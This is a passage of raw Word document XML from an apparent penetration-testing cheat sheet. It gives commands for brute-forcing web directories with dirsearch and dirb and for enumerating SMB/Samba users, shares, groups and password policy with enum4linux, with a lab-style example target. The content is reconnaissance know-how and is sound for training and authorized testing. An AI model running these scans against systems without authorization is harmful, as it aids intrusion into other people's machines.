            <w:r w:rsidRPr="00500E0F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>default on Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="198AEA5F" w14:textId="77777777" w:rsidR="00676F23" w:rsidRPr="00EF6A12" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF6A12">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS A WEBSITE ASSOCIATED WITH THE IP ADDRESS. OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="014DEC4C" w14:textId="77777777" w:rsidR="00676F23" w:rsidRPr="00EC2BE0" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>First, ensure dirsearch is installed as it is not installed on Kali Linux by default:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B51381">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51381">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B51381">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00B51381">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>dirsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00676F23" w14:paraId="280D698E" w14:textId="77777777" w:rsidTr="00676F23">
        <w:trPr>
          <w:trHeight w:val="630"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="278AE5D5" w14:textId="3C52CEB1" w:rsidR="00676F23" w:rsidRDefault="003C01E2" w:rsidP="00676F23">
            <w:r>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="00676F23">
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="169FD9A3" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>dirsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D6CF55B" w14:textId="77777777" w:rsidR="00676F23" w:rsidRPr="00EF6A12" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Use dirsearch in a similar fashion to gobuster but dirsearch is a little more user friendly:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>dirsearch</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-u</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">http://X.X.X.X </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/dirb/wordlists/</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>common.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00676F23" w14:paraId="7C6E9E9F" w14:textId="77777777" w:rsidTr="00676F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="25974557" w14:textId="3E668104" w:rsidR="00676F23" w:rsidRDefault="003C01E2" w:rsidP="00676F23">
            <w:r>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="00676F23">
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="374BE725" w14:textId="74095596" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>dirb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75EF520A" w14:textId="77777777" w:rsidR="00676F23" w:rsidRPr="00EF6A12" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF6A12">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS A WEBSITE ASSOCIATED WITH THE IP ADDRESS. OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="792B38D3" w14:textId="252558B3" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:r>
              <w:t>Use dirb in a similar fashion to dirsearch, the text file to dictionary attack from doesn’t require a switch to input, simply leave a space after the URL, for example:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A2FE5C6" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003A3CF7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>dirb</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>242</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/dirb/wordlists/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>big</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -l</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
              <w:t>-w</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:t>Don’t pause for warning comments</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00707653">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-l </w:t>
            </w:r>
            <w:r>
              <w:t>Print ‘Location’ headers</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A8E9ECA" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:r>
              <w:t xml:space="preserve">A great file to use in any website scanning tool is </w:t>
            </w:r>
            <w:r w:rsidRPr="00500E0F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/dirb/wordlists/common.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00676F23" w14:paraId="7F0C9D36" w14:textId="77777777" w:rsidTr="00676F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3AC8218A" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2ABB74A4" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="74767252" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4497867D" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23"/>
    <w:p w14:paraId="57716CFC" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A7E75E" w14:textId="12ECA88F" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r w:rsidR="009379D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>num4</w:t>
      </w:r>
      <w:r w:rsidR="009379D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
      <w:r w:rsidR="00D64CF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | PsTools</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9379D1" w14:paraId="216979FA" w14:textId="77777777" w:rsidTr="00252369">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24DB877D" w14:textId="56247D2E" w:rsidR="009379D1" w:rsidRDefault="009379D1" w:rsidP="00854B38">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="14E9935D" w14:textId="43536156" w:rsidR="009379D1" w:rsidRDefault="009379D1" w:rsidP="00854B38">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>enum4linux</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>enum4linux</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is already installed on Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E8A9893" w14:textId="3890006E" w:rsidR="009379D1" w:rsidRPr="00BD4365" w:rsidRDefault="009379D1" w:rsidP="00BD4365">
            <w:r w:rsidRPr="00D5731C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve">IF THERE IS A </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>SMB OR SAMBA TRY</w:t>
            </w:r>
            <w:r w:rsidRPr="00D5731C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>ENUM4LINUX</w:t>
            </w:r>
            <w:r w:rsidRPr="00D5731C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>, OTHERWISE SKIP.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00BD4365">
              <w:t>A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1616758D" w14:textId="64CA720A" w:rsidR="003C01E2" w:rsidRDefault="009379D1" w:rsidP="00BD4365">
            <w:r w:rsidRPr="00BD4365">
              <w:t xml:space="preserve">It attempts to offer similar functionality to enum.exe formerly available from </w:t>
            </w:r>
            <w:r w:rsidR="003C01E2" w:rsidRPr="003C01E2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>www.bindview.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD4365">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09366568" w14:textId="6301EA2A" w:rsidR="003C01E2" w:rsidRDefault="003C01E2" w:rsidP="00BD4365"/>
          <w:p w14:paraId="5B814A16" w14:textId="6C39C577" w:rsidR="00D64CF0" w:rsidRDefault="00D64CF0" w:rsidP="00BD4365">
            <w:r>
              <w:t>To use it against a remote machine, you will need credentials first:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="750ED5C3" w14:textId="33FA1270" w:rsidR="009379D1" w:rsidRPr="00BD4365" w:rsidRDefault="003C01E2" w:rsidP="00BD4365">
            <w:r w:rsidRPr="003C01E2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">enum4linux </w:t>
            </w:r>
            <w:r w:rsidRPr="003C01E2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-u </w:t>
            </w:r>
            <w:r w:rsidRPr="003C01E2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">USERNAME </w:t>
            </w:r>
            <w:r w:rsidRPr="003C01E2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="003C01E2">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t xml:space="preserve">PASSWORD </w:t>
            </w:r>
            <w:r w:rsidRPr="003C01E2">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r w:rsidR="009379D1">
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="750379ED" w14:textId="0CB7B0D7" w:rsidR="009379D1" w:rsidRDefault="009379D1" w:rsidP="00854B38">
            <w:r>
              <w:t xml:space="preserve">The command, </w:t>
            </w:r>
            <w:r w:rsidRPr="00316964">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>enum4linux</w:t>
            </w:r>
            <w:r>
              <w:t>, can be used with various flags, such as:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-U</w:t>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009379D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Get userlist</w:t>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-M</w:t>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:t>Get machine list</w:t>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-S</w:t>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:t>Get sharelist</w:t>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-o</w:t>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:tab/>
              <w:t>Get OS info</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-d</w:t>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:tab/>
              <w:t>Be more detailed about userlist and sharelist</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="007D5DD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-P</w:t>
            </w:r>
            <w:r w:rsidRPr="007D5DD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007D5DD3">
              <w:t>Get password policy information</w:t>
            </w:r>
            <w:r w:rsidRPr="007D5DD3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00316964">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-G</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>Get group and member list</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-i</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Get printer info</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00316964">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-a</w:t>
            </w:r>
            <w:r w:rsidRPr="00316964">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
              <w:t>Do all simple enumeration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> (U,S,G,P,r,o,n,i)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00316964">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>Be detailed, applies to -U and -S</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00316964">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-u</w:t>
            </w:r>
            <w:r w:rsidRPr="00316964">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> user   </w:t>
            </w:r>
            <w:r>
              <w:t>Specify username to use (default "")</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B7695">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Give more information</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00316964">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r w:rsidRPr="00316964">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> pass   </w:t>
            </w:r>
            <w:r>
              <w:t>Specify password to use (default "")</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009379D1" w14:paraId="681DFBE5" w14:textId="77777777" w:rsidTr="00252369">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3EDBBB43" w14:textId="3629159E" w:rsidR="009379D1" w:rsidRPr="009379D1" w:rsidRDefault="009379D1" w:rsidP="00854B38">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0EABCF23" w14:textId="77777777" w:rsidR="009379D1" w:rsidRPr="009379D1" w:rsidRDefault="009379D1" w:rsidP="00854B38">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
